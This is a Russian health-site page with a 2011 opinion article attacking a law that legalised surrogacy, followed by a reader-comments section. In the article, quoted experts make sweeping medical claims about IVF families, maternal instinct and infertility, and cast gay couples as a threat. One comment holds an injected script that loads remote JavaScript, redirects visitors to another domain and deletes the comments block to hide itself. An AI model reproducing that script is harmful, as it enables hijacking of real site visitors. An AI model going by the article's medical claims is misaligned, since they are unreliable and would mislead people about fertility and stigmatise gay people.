Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Все будем мы жить по-друг...  >>  Все будем мы жить по-другому
 
Обратная связь
 

Все будем мы жить по-другому

Размер шрифта
25 октября 2011 08:38
  • google_analytics: false
  • Нравится

Суррогатное материнство отныне – легализованный новым законом способ завести ребенка. Когда ребенка продают еще до рождения за энную сумму, нормально ли это? Какой будет теперь семья и правда ли, что не та мать, что родила, а та, что купила?



В пятницу принят новый закон «Об охране здоровья граждан». Более чем противоречивый, непродуманный, вызвавший шквал критики закон. Главное обвинение со стороны общественности к законникам в том, что этим проектом они собираются поставить все здравоохранение на коммерческие рельсы. И мало того – они делают это в ситуации, когда уровень коррупции в стране превосходит все мыслимые и немыслимые границы. При полном отсутствии правового поля обществу хотят предложить и возможность через частного предпринимателя купить и продать органы и ткани, и возможность принудительно стерилизовать недееспособную женщину, и – подарить бездетным парам потомство через суррогатную мать.

Проект долго обсуждался на всех уровнях, однако авторы во многом не сочли необходимым прислушаться к гласу народа и предпочли оставить за скобками любые пояснения, которые помогли бы избежать тяжелых правовых и моральных коллизий, в том чиле и там, где речь идет о суррогатном материнстве. Как быть с приоритетным правом родителей на ребенка, рожденного у суррогатной матери? Что будет с детьми, которых «родила» себе гомосексуальная пара? Не является ли евгеникой сама попытка родить ребенка с определенными антропологическими стандартами?

Quid prodest? Или: ищи кому выгодно

Выгодно для демографической ситуации, рассказывают авторы закона. По мнению директора Института демографических исследований Игоря Белобородова, невозможно решить проблему демографии вдруг, «одним кавалерийским наскоком». Должно смениться не одно поколение, прежде чем изменится система произведения потомства. Улучшить демографию можно только за счет брачной рождаемости, когда ребенок воспитывается в семье в своем особом культурном контексте, а не за счет действия суррогатов или каких-то внесемейных альтернатив.

Так кому это выгодно?

По мнению Игоря Белобородова, суррогатное материнство – это форма женского рабства. Заключается договор, когда женщина сдает свое тело в аренду. А заказчик считает себя вправе требовать ребенка с определенным цветом глаз, определенной внешности и даже похожего на определенных гениальных или исторических людей. И что будет с ребенком, который «не понравился»?

По мнению Белобородова, это выгодно прежде всего сообществу гомосексуалистов, давно сетующему, что суррогатное материнство в нашей стране не сильно распространено. Когда только гомосексуальные пары получают возможность заводить детей, они начинают активную пропаганду своего образа жизни.

Суррогатное материнство предполагает экстракорпоральное оплодотворение или вспомогательные репродуктивные технологии. Все это можно назвать медицинскими экспериментами. Любые эксперименты, к которым, безусловно, относится и суррогатное материнство, были запрещены во время Нюрнбергского процесса. По мнению семейного психотерапевта, специалиста  по психогенному бесплодию Галины Масленниковой, суррогатное материнство – это самый бесчеловечный эксперимент. По ее опыту работы с родителями, все семьи, пережившие искусственное оплодотворение, развелись. Почти каждая, получившая ребенка именно таким путем, оставляет его в приюте и не интересуется его дальнейшей судьбой.

По наблюдениям психолога, двух-трехлетние дети, рожденные в результате эксперимента, чрезвычайно трудно входят в контакт с другими детьми и очень плохо ладят с матерями. У матери ребенка из пробирки после многочисленных гормональных интервенций может не включиться механизм грудного вскармливания. Такая женщина не имеет инстинкта материнства.

Суррогатная мать, выносившая ребенка в своей утробе, может полюбить этого ребенка и будет вынуждена с ним расстаться. Личность формируется с момента зачатия и в течение 9 месяцев, и если мать с любовью вынашивает свое дитя, то на свет рождается человек, устойчивый к социальным изменениям. Ребенок, который вынашивается без любви, будет душевным инвалидом. И этот опыт нелюбви даст ему практику мстить за отсутствие любви, вряд ли он сможет создать в будущем нормальную семью.

По мнению Масленниковой, суррогатное материнство родилось с идеей о безопасном сексе. Сейчас этот миф пытаются внести в законодательные акты. Но разговоры о репродуктивных правах надо начинать с разговоров о репродуктивном поведении, которое должно быть основано только на любви. Любые проблемы аборта, гомосексуализма, суррогатного материнства – все это проблемы отношений, которые рождаются в семье. Нарушение отношений в семье приводит к поиску суррогатов во всем. Только возвращение к естественной семье, основанной на браке и на союзе мужчины и женщины, способны решить и демографические проблемы, и проблемы здоровья.

Есть ли альтернативы?

Безусловно. Это – усыновление. Опыт показывает, что кровное родство не так важно, как воспитательное воздействие, об этом скажет любой педагог или психолог. Бесплодие невозможно, если есть матка и хотя бы одна труба и яичник. Может быть пониженная плодность, но не бесплодие. И клеймо «бесплодная» в отношении женщины, которая в течение определенного времени не может забеременеть, – это просто безграмотность. 

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:07

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.